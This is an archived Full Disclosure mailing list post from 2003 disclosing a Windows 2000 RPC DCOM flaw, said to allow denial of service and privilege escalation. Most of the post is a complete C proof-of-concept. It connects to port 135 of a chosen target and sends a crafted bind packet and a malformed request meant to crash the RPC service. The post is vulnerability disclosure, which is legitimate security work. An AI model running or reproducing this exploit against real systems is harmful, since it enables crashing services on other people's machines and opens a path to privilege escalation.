Full Disclosure mailing list archives
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability
From: "benjurry" <benjurry () xfocus org>
Date: Mon, 21 Jul 2003 23:53:03 +0800
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability 1.Description: There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages. By sending a messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal. The reason for this is that __RemoteGetClassObject intface passed a NULL point to PerformScmStage Function; If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash. 2.Affected Systems:Windows 2000 +SP3 Windows 2000 +SP4+MS03-026 HotFix 3.Proof of concept codes: #include <winsock2.h> #include <stdio.h> #include <windows.h> #include <process.h> #include <string.h> #include <winbase.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00, 0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00, 0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}; void main(int argc,char ** argv) { WSADATA WSAData; int i; SOCKET sock; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[0x1000]; printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n"); printf("Code by FlashSky,Flashsky () xfocus org,benjurry,benjurry () xfocus org\n"); printf("Welcome to http://www.xfocus.net\n"); if(argc<2) { printf("useage:%s target\n",argv[0]); exit(1); } if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return; } if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { printf("Connect failed.Error:%d",WSAGetLastError()); return; } if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } i=recv(sock,buf1,1024,MSG_PEEK); if (send(sock,request,sizeof(request),0)==SOCKET_ERROR) { printf("Send failed.Error:%d\n",WSAGetLastError()); return; } i=recv(sock,buf1,1024,MSG_PEEK); } 4.Author:flashsky () xfocus org e-mail: fangxing () venustech com cn flashsky () xfocus org Thanks Benjerry () xfocus org for testing and translation. Welcome visit our www site: http://www.xfocus.org http://www.venustech.com.cn _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Secunia - Delaying information again! Curious ByStander (Jul 21)
- <Possible follow-ups>
- Re: Secunia - Delaying information again! Curious ByStander (Jul 21)
- Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability benjurry (Jul 21)